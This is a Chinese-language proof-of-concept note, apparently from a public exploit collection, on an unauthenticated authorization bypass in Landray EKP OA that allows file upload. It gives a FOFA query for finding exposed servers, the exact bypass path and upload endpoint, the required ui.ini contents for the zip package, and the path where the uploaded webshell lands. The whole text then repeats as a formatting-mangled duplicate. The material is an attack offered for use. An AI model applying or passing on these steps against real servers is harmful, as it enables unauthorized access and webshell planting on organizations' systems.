adysec_POC/wpoc/蓝凌OA/蓝凌EKP前台授权绕过导致文件上传.md


## 蓝凌EKP前台授权绕过导致文件上传


## fofa
```
app="Landray-OA系统"
```

访问路径/api///sys/ui/sys_ui_extend/sysUiExtend.do?method=upload其中路径需要api后面需要///不能变。

## poc
```
/api///sys/ui/sys_ui_extend/sysUiExtend.do?method=upload

```
![image](https://github.com/wy876/POC/assets/139549762/47bd374a-d072-46ab-824e-e23ef8d08a69)


## 文件上传
然后上传zip包需要有ui.ini文件内容如下
```
id=ZzzZname=testthumb=test

```
![image](https://github.com/wy876/POC/assets/139549762/1d6615f9-a98b-4747-a6a8-9e6bdd3218c0)

![image](https://github.com/wy876/POC/assets/139549762/1cb1a160-309f-44bb-b0d3-03e59b163258)

马会在/resource/ui-ext/ZzzZ/jmdyy.jsp
wy876 POC backup 2025-03-07 18:18:50 +08:00
			`## 蓝凌EKP前台授权绕过导致文件上传`


			`## fofa`
			```
			`app="Landray-OA系统"`
			```

			`访问路径/api///sys/ui/sys_ui_extend/sysUiExtend.do?method=upload其中路径需要api后面需要///不能变。`

			`## poc`
			```
			`/api///sys/ui/sys_ui_extend/sysUiExtend.do?method=upload`

			```
			`![image](https://github.com/wy876/POC/assets/139549762/47bd374a-d072-46ab-824e-e23ef8d08a69)`


			`## 文件上传`
			`然后上传zip包需要有ui.ini文件内容如下`
			```
			`id=ZzzZname=testthumb=test`

			```
			`![image](https://github.com/wy876/POC/assets/139549762/1d6615f9-a98b-4747-a6a8-9e6bdd3218c0)`

			`![image](https://github.com/wy876/POC/assets/139549762/1cb1a160-309f-44bb-b0d3-03e59b163258)`

			`马会在/resource/ui-ext/ZzzZ/jmdyy.jsp`